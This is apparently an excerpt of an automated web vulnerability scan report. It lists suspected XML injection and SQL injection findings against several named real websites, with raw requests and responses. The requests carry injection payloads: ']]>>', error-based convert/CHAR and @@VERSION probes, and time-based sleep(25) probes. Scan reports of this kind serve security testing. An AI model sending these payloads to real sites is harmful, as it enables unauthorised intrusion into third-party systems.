Set-Cookie: .ASPXAUTH=204DAD60EB1BBD88C59E5F5F9173063C696A0F7001F3DAB68B91E49725FD98FA9004A1B768AD6C5CCF6FC284A723C82A4AE351B51D920A7472D17715227F8C8F5EA7067B1EC089AE4B0F0AD2D9D779F79D62DB169E8EB4A2EDB1833E9FBFB093E1F7AA47EC45274B2DB2BA709F7D2D261236D9197EEE8A4CF97B216F06C285E994CAAB0AF14BE9CF81CF25F5779A8377F57F2E3A93FF28013B612CC450AC879DDF0FFF87E5F1BFA2EA945555182C4ADA; expires=Wed, 25-May-2011 16:13:07 GMT; path=/; HttpOnly
P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA"
ROR-NODE: 09
Content-Length: 18684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/LoginPage.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ctl00$cphBodyTemplate$cphLeftMasterReport$Login1$PasswordTextbox" type="password" id="ctl00_ctl00_cphBodyTemplate_cphLeftMasterReport_Login1_PasswordTextbox" size="40" /></td>
...[SNIP]...

10. XML injection previous next
There are 6 instances of this issue:

http://api.facebook.com/restserver.php [format parameter]
http://api.flickr.com/services/feeds/photos_public.gne [format parameter]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]
http://www.netdiligence.com/xml_content/stories.xml [REST URL parameter 1]

10.1. http://api.facebook.com/restserver.php [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:22:36 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.44.124
X-Cnection: close
Date: Mon, 25 Apr 2011 15:20:36 GMT
Content-Length: 773

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.2. http://api.flickr.com/services/feeds/photos_public.gne [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.flickr.com
Path:	/services/feeds/photos_public.gne

Issue detail

Request

GET /services/feeds/photos_public.gne?id=35898586@N08&lang=en-us&format=json]]>>&jsoncallback=jsonp1303758888918 HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:42:06 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 09 Mar 2011 01:14:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www25.flickr.mud.yahoo.com
Connection: close
Content-Type: application/atom+xml; charset=utf-8
Content-Length: 32163

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<feed xmlns="http://www.w3.org/2005/Atom"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:flickr="urn:flickr:"
xmlns:media="
...[SNIP]...

10.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:37 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1987947190
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:50 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1698422522
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10.5. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:06:06 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 610014231
Age: 0
Via: 1.1 varnish
Content-Length: 367
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10.6. http://www.netdiligence.com/xml_content/stories.xml [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.netdiligence.com
Path:	/xml_content/stories.xml

Issue detail

Request

GET /xml_content]]>>/stories.xml HTTP/1.1
Host: www.netdiligence.com
Proxy-Connection: keep-alive
Referer: http://www.netdiligence.com/slickboard.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116969625.1303748949.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116969625.1813302970.1303748949.1303748949.1303748949.1; __utmc=116969625; __utmb=116969625.1.10.1303748949

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 16:29:02 GMT
Server: Apache
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /xml_content]]>>/stories.xml was not found on this server.</p>
...[SNIP]...

11. SQL statement in request parameter previous next
There are 11 instances of this issue:

https://checkout.netsuite.com/core/media/media.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://learn.shavlik.com/shavlik/index.cfm
https://secure.trust-guard.com/ResetPassword.php
https://support.trust-guard.com/index.php
https://support.trust-guard.com/visitor/index.php

11.1. https://checkout.netsuite.com/core/media/media.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/media/media.nl

Request

GET /core/media/media.nl?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&c=NLCORP&h=65bae699770c58b12c10 HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 14:28:11 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700483469:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 1983

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82
...[SNIP]...

11.2. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Request

GET /core/styles/pagestyles.nl?ct=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=pbWBN1GZpsFMMPGgD9fLtR1NsNxGljmTjF8P6kCVL9tLVKlFGB6qxvrttG2GmQHnFDK4npSP202Q0Q5SDBy6smMPTW80GnM5p2KvFCT1Xnpb36YTfw4s4JZlBHvMLJsr!1726784262; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:09 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:09 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT
NS_RTIMER_COMPOSITE: 777140821:616363742D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69389

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

11.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://checkout.netsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 791381320:616363742D6A6176613034382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2p9QN1GJ2Z3S12xNCxQXlL1Sv9knyGTvcHGHKQhgRRLQvyzhppkLn91h0g3vBgYBjvYSZNXQykRX2kdnyQtQ3vxTgnKhjWyvZHZrDRvvmfT79J0vzSz4Lp1DGswvblyw!-1046013267; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

11.4. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/s.nl

Request

GET /s.nl?c=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sc=4&whence=3&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Location: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 339

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://checkout.netsuite.com/page
...[SNIP]...

11.5. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Cookie: ASPSESSIONIDSSRCBTSB=CEAKPIJCCMCNNEOHIFEHAOEN; KTMDWestLB=1211368202.20736.0000; ASPSESSIONIDSSRADQTB=BCMNMKJCKPMBDHCEEMCKNLDG; Emp=datpwx=&UN=u662%3A%2F%2F0r652n4xr4%2Ep1z%2F0&SkipSSL=&PT=&CNAME=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 201

image1=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&txtPassword=3&txtUsername=Smith

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Content-Length: 3924
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=fzv6u&SkipSSL=&PT=&CNAME=UnicruEmployer&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=; path=/
Cache-control: private

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.6. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...

11.7. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

11.8. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

...[SNIP]...

11.9. https://secure.trust-guard.com/ResetPassword.php previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://secure.trust-guard.com
Path:	/ResetPassword.php

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 119

btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check
...[SNIP]...

11.10. https://support.trust-guard.com/index.php previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://support.trust-guard.com
Path:	/index.php

Request

GET /index.php?_m=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&_a=submit HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />

11.11. https://support.trust-guard.com/visitor/index.php previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://support.trust-guard.com
Path:	/visitor/index.php

Request

GET /visitor/index.php?_m=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&_a=htmlcode&departmentid=0&fullname=Smith&email=netsparker@example.com HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:07:38 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />

12. SSL cookie without secure flag set previous next
There are 38 instances of this issue:

https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
https://checkout.netsuite.com/core/
https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
